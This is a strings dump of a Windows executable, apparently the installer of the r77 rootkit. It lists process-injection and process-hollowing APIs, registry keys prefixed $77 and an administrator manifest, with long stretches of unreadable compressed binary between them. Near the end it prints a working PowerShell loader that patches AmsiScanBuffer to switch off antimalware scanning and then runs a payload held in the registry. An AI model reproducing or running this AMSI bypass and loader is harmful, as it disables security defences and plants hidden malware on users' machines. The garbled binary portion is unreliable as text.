!This program cannot be run in DOS mode.
`.rdata
@.rsrc
@.reloc
t(h0"@
ntdll.dll
RtlGetVersion
.text$mn
.idata$5
.rdata
.rdata$voltmd
.rdata$zzzdbg
.idata$2
.idata$3
.idata$4
.idata$6
.rsrc$01
.rsrc$02
StrCpyW
StrCatW
StrStrIW
StrNCatW
SHLWAPI.dll
HeapFree
lstrlenW
HeapAlloc
GetProcessHeap
SizeofResource
GetCurrentProcess
FindResourceA
GetModuleHandleA
LockResource
LoadResource
GetProcAddress
IsWow64Process
ExitProcess
KERNEL32.dll
RegOpenKeyExW
CryptReleaseContext
CryptGenRandom
CryptAcquireContextW
RegSetValueExW
ADVAPI32.dll
CoUninitialize
CoCreateInstance
CoInitializeSecurity
CoInitializeEx
ole32.dll
OLEAUT32.dll
!This program cannot be run in DOS mode.
`.reloc
<jX(!
(ZjX(!
v2.0.50727
#Strings
get_Service32
get_Dll32
Microsoft.Win32
ToUInt32
ReadInt32
WriteInt32
ToInt32
get_Service64
get_Dll64
ReadInt64
WriteInt64
ToInt64
ReadInt16
ToInt16
<Module>
CreateFileA
MODULEINFO
System.IO
mscorlib
get_Id
parentProcessId
processId
GetProcessById
NtResumeThread
NtGetContextThread
NtSetContextThread
thread
payload
NewGuid
shareMode
EnterDebugMode
CompressionMode
SizeOfImage
IDisposable
GetModuleHandle
RuntimeTypeHandle
CloseHandle
GetTypeFromHandle
inheritHandle
handle
templateFile
MapViewOfFile
module
fileName
moduleName
ControlPipeName
applicationName
GetProcessesByName
commandLine
LocalMachine
ValueType
allocationType
R77ServiceSignature
R77HelperSignature
get_Culture
set_Culture
resourceCulture
Dispose
Allocate
EditorBrowsableState
UpdateProcThreadAttribute
CompilerGeneratedAttribute
GeneratedCodeAttribute
UnverifiableCodeAttribute
DebuggerNonUserCodeAttribute
DebuggableAttribute
EditorBrowsableAttribute
SecurityPermissionAttribute
CompilationRelaxationsAttribute
RuntimeCompatibilityAttribute
attribute
ReadByte
previousValue
SetValue
Stager.exe
get_Size
returnSize
CreateFileMapping
ToString
maximumSizeHigh
fileOffsetHigh
Unhook
AllocHGlobal
Marshal
System.ComponentModel
BaseOfDll
UnhookDll
kernel32.dll
psapi.dll
ntdll.dll
msvcrt.dll
GZipStream
CopyStream
MemoryStream
stream
Program
OperatingSystem
resourceMan
bytesWritten
get_OSVersion
get_Version
System.IO.Compression
GetModuleInformation
processInformation
destination
System.Globalization
SecurityAction
NtUnmapViewOfSection
System.Reflection
SectionCharacteristicsToProtection
creationDisposition
Exception
moduleInfo
CultureInfo
startupInfo
numberOfBytesToMap
Buffer
buffer
get_ResourceManager
Stager
System.CodeDom.Compiler
Helper
BitConverter
get_Major
UIntPtr
WriteIntPtr
characteristics
System.Diagnostics
System.Runtime.InteropServices
System.Runtime.CompilerServices
System.Resources
Stager.Properties.Resources.resources
DebuggingModes
Stager.Properties
inheritHandles
threadAttributes
flagsAndAttributes
fileMappingAttributes
processAttributes
securityAttributes
GetBytes
creationFlags
System.Security.Permissions
desiredAccess
access
CreateProcess
OpenProcess
GetCurrentProcess
process
baseAddress
address
Decompress
zeroBits
Concat
fileMappingObject
GetObject
oldProtect
VirtualProtect
newProtect
protect
op_Explicit
Environment
environment
EntryPoint
suspendCount
attributeCount
Decrypt
InitializeProcThreadAttributeList
attributeList
R77Const
context
maximumSizeLow
fileOffsetLow
VirtualProtectEx
HidePrefix
ToArray
OpenSubKey
RegistryKey
get_Assembly
memcpy
BlockCopy
FreeLibrary
NtAllocateVirtualMemory
NtWriteVirtualMemory
currentDirectory
Registry
op_Equality
op_Inequality
System.Security
System.Security.Permissions.SecurityPermissionAttribute, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
SkipVerification
WrapNonExceptionThrows
3System.Resources.Tools.StronglyTypedResourceBuilder
17.0.0.0
lSystem.Resources.ResourceReader, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP
_W{wpm
{F+{M^0
~wl4C(
fm~xz/
%x% LB
BGbI@6
[Q/\|CA5
\\0m!h
4sv*4c
|iKLiK
J%v,xC&
KCOlQC7
/"3Ns~*GOj
d:8M&"
t"RQP/(s
3)5M::
qy-GF"
KiDnFscl
AaNo&!Z
P'4M-4J9
`OHz":B
-\!\5:o0~
=3-`$4
tRBIiz?_H
?](TRJ
kZfEiw=9
J~55/)
oSL(ob
u8+Oa8h
!QuRf>
/.}+<I'
/mLJAr
~nmDS5:g
,95p]@
a0MH.T
zLl)%l
`{<= Ncw0%
.jhd1E
o1g=ya
$ko"q'S5
m.GJ.p
G0E]OF
v>*;pB
W;BL0@
E-2kh6
6&ut{1
C~eS'5Z
.{ FMB+
:Jgm=_u
SiR0.2
$}4D\j!
^p+bWlw
B$rrS^
%UA=o^QL
vPUkaS=
:p2Zm7
'aR@(_T
w;JSTnm/h
%!O*S#
ySO%~Oh
2u=T*gW_Y
Ksm:tyr1u
6OxKJZ
?p`8Z~
3aJl%4
h+^WP{
{ +-&-
9 AUJ7
rQK`KN
0\R.X{
S^5Fe7
:se?aw
b4 Rc4
)!8\`O
kSX2N-b6RC
b-5kmm
$SWS#]MM[
G/(& e
2`ZZfYz
}I}I~e
t^`-|#
fonnoC
-sv No
4'P&g)<
|e2+8"
|PJ[Gi
-"zW )
?pRq,
!u=e4]
4]nrq9e
MtYY0??
!\u44J
,cf1V1
xJ?I#I))
'QMRIB
2W2 k,
KRL"pJ
~Ec`u]
e,(-p-
DE*QJQ
8QQ4f[[
r#:LPe
%oQU"bn
w9/l<x
SD^!VS
iM!`5%
S;G<^S
&oL!YF
mW(`8h
(Y(`8 -
>F" X
r lSPy~uJ
>u}+y}K
KiE}:a
+BoEid{
<ZT$V-
Nwl/W*V
]C.Z^z
Fi;=i;
r6> wY
{g=:dm
ai[Vo+
.YLJsK
uUYXWm
,UOm}G+
p2h~1lc
/S+F8?
ws7Dln
2<MtJMT-
qY5$y~
^[6fWZk
m2>,-5
x?sckH
PA2S2T
P\lJ&#-
qTf|Go
O5(JXR
x ]xvk
aw&gI(
G F?0Y
XuCp.!
F!]2nm7
GX/t{;.
Oz-APnzB
#"Kkz#
wxNB%?
UPA2KG]
gj\D{m
P#3Lh~0
DskqppHt
ai?-{m(
e %K$z
cQe*LZ
KZA(2[e
r.<O}\
0A IhsH[
c?*@"j
sA^;vT|K
Lkw,!KC
fGSZ!#
l<rG9O
Y?R-BRu
h_4ZO
F([ Ioq
Y]@s@c
>Wiu6*_
b<L:VFv:
V`AjP~
Lcyh~M
#@==L[
NL_|Y8
:^I4[=
('2:O1kp
96)Nki
}Pa:P9
9nrI D
!&+nQkhb
M%zAHj
u4AmkE9
lXG6,#
SOa5*3
S[QrB.
ma!p.EX
N/h$Fg
?%H|hGS
)dA[vT%
e=cdN`@
:;,NR\
LJjh`C
N2]y%j
XXV(u`
6!(]R#
#9A@EH
;Y$uYNS
EUCA h?
y yz+xr54
RR",,%W{R/=@
BlE`C]
M-)OHr
L5]qSA[
&j5r@1D
xs@8$3!"
bBj(w
"@U^@P
XCpl#@b
xgqg|G
-K)C{=}c
Yms[kV
c:UttDT
SeWYUf
JZI*q%
RZJJq)*
ZRSjHui
eySNIY
gEy@<l
^{tM:'
X/I\z.#
_aX@P$`,
E(*M+J;
FZ1E5E&
%!KRSu
r< G(N-.
T"B_%A
|qK*(G
_X/'RdO
qY-FV)
Q^f9 u
mat#%<
HeM{!/5
OxsnGs
ghhj<Hk2\
/st,{M
XL6mhr
?wQkoZ
_CorExeMain
mscoree.dll
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level='requireAdministrator' uiAccess='false' />
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
0 0/0;0]0?1F1
222:2@2R2G3
4$515A5[5v5~5
6[6a6~6
8(868t8{8
9!9-999E9Q9]9i9u9
:;:H:N:e:o:
;B;S;c;~;
Microsoft Base Cryptographic Provider v1.0
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
SYSTEM
ESOFTWARE
$77stager
$77svc32
$77svc64
powershell
function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]$ReturnType)$TypeBuilder=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(`ReflectedDelegate`)),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(`InMemoryModule`,$False).DefineType(`MyDelegateType`,`Class,Public,Sealed,AnsiClass,AutoClass`,[MulticastDelegate]);$TypeBuilder.DefineConstructor(`RTSpecialName,HideBySig,Public`,[Reflection.CallingConventions]::Standard,$ParameterTypes).SetImplementationFlags(`Runtime,Managed`);$TypeBuilder.DefineMethod(`Invoke`,`Public,HideBySig,NewSlot,Virtual`,$ReturnType,$ParameterTypes).SetImplementationFlags(`Runtime,Managed`);Write-Output $TypeBuilder.CreateType();}$NativeMethods=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(`System.dll`)}).GetType(`Microsoft.Win32.UnsafeNativeMethods`);$GetProcAddress=$NativeMethods.GetMet
[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AmsiScanBufferPtr,6);
[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);
[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBufferPtr,[uint32]8,0x20,[ref]$OldProtect);
[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$77stager`)).EntryPoint.Invoke($Null,$Null)
Get-Delegate
ParameterTypes
ReturnType
TypeBuilder
NativeMethods
GetProcAddress
LoadLibraryDelegate
VirtualProtectDelegate
Kernel32Ptr
LoadLibraryPtr
VirtualProtectPtr
AmsiPtr
AmsiScanBufferPtr
OldProtect
'+[Char](
ntdll.dll
kernel32.dll
SOFTWARE
$77dll32
$77dll64
C:\Windows\System32\dllhost.exe
/Processid:
winlogon
C:\Windows\System32\
Stager.Properties.Resources
Service32
Service64
$77control
Service32
Service64